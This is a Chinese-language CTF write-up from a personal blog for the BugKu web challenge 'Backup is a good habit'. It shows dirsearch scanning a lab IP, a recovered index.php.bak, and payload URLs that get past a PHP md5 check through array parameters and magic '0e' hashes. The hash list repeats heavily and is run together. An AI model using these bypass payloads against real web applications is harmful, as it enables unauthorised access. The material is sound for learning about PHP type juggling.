BugKu---------备份是个好习惯

title: BugKu---------备份是个好习惯
date: 2021-06-23 16:48:44
description: 前言:零度安全搭建博客后的第N篇文章
top:
categories: BugKu刷题
tags:

• 网络安全
• BugKu

BugKu---------备份是个好习惯

​ 默默成长的web狗，BugKu，那个菜鸡又回来刷题了。

题目

解题思路

​ 题目上说是备份是个好习惯，所以我们第一要想到使用disearch这个工具去扫描指定的URL

解题过程

1. 打开kali,运行disearch这个py脚本，执行payloaddirsearch.py -u http://114.67.246.176:13080/
2. 访问备份的链接，获取到备份文件http://114.67.246.176:13080/index.php.bak
3. 打开备份文件，发现是一个PHP代码<?php/** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22*/include_once"flag.php";ini_set("display_errors",0);$str=strstr($_SERVER['REQUEST_URI'],'?');$str=substr($str,1);$str=str_replace('key','',$str);parse_str($str);echomd5($key1);echomd5($key2);if(md5($key1)==md5($key2)&&$key1!==$key2){echo$flag."取得flag";}?>
4. 上段代码的意思是需要两个不同的key不同，但是两个key的md5的值是相同的1. 使用kekeyy数组进行绕过，md5函数无法处理数组，这样就会返回两个NULL，而两个NULL的md5值是一样的，但是传入的key值可以不同。http://114.67.246.176:13080/?kekeyy1[]=aaa&kekeyy2[]=bb2. 使用==这个的比较漏洞，如果两个字符经过md5加密后的值是0exxxxx形式，在科学计数法中会被认为是0*10的几次方的，结果是0。此时，md5加密值相等，但是key值是不等的，下面是md5加密后是0exxxxx形式的。2406107080e462097431906509019562988736854QNKCDZO0e830400451993494058024219903391s878926199a0e545993274517709034328855841020s155964671a0e342768416822451524974117254469 s214587387a0e848240448830537924465865611904s214587387a0e848240448830537924465865611904 s878926199a0e545993274517709034328855841020 s1091221200a0e940624217856561557816327384675 s1885207154a0e509367213418206700842008763514s1502113478a0e861580163291561247404381396064s1885207154a0e509367213418206700842008763514s1836677006a0e481036490867661113260034900752 s155964671a0e342768416822451524974117254469 s1184209335a0e072485820392773389523109082030 s1665632922a0e731198061491163073197128363787s1502113478a0e861580163291561247404381396064s1836677006a0e481036490867661113260034900752 s1091221200a0e940624217856561557816327384675 s155964671a0e342768416822451524974117254469s1502113478a0e861580163291561247404381396064s155964671a0e342768416822451524974117254469s1665632922a0e731198061491163073197128363787 s155964671a0e342768416822451524974117254469 s1091221200a0e940624217856561557816327384675 s1836677006a0e481036490867661113260034900752 s1885207154a0e509367213418206700842008763514 s532378020a0e220463095855511507588041205815s878926199a0e545993274517709034328855841020s1091221200a0e940624217856561557816327384675s214587387a0e848240448830537924465865611904s1502113478a0e861580163291561247404381396064s1836677006a0e481036490867661113260034900752 s1665632922a0e731198061491163073197128363787s878926199a0e545993274517709034328855841020s878926199a0e545993274517709034328855841020s155964671a0e342768416822451524974117254469s214587387a0e848240448830537924465865611904s214587387a0e848240448830537924465865611904s878926199a0e545993274517709034328855841020s1091221200a0e940624217856561557816327384675s1885207154a0e509367213418206700842008763514s1502113478a0e861580163291561247404381396064s1885207154a0e509367213418206700842008763514s1836677006a0e481036490867661113260034900752s155964671a0e342768416822451524974117254469s1184209335a0e072485820392773389523109082030s1665632922a0e731198061491163073197128363787s1502113478a0e861580163291561247404381396064s1836677006a0e481036490867661113260034900752s1091221200a0e940624217856561557816327384675s155964671a0e342768416822451524974117254469s1502113478a0e861580163291561247404381396064s155964671a0e342768416822451524974117254469s1665632922a0e731198061491163073197128363787s155964671a0e342768416822451524974117254469s1091221200a0e940624217856561557816327384675s1836677006a0e481036490867661113260034900752s1885207154a0e509367213418206700842008763514s532378020a0e220463095855511507588041205815s878926199a0e545993274517709034328855841020s1091221200a0e940624217856561557816327384675s214587387a0e848240448830537924465865611904s1502113478a0e861580163291561247404381396064s1091221200a0e940624217856561557816327384675s1665632922a0e731198061491163073197128363787s1885207154a0e509367213418206700842008763514s1836677006a0e481036490867661113260034900752s1665632922a0e731198061491163073197128363787s878926199a0e545993274517709034328855841020构造payload如下http://114.67.246.176:13080/?kekeyy1=240610708&kekeyy2=QNKCDZO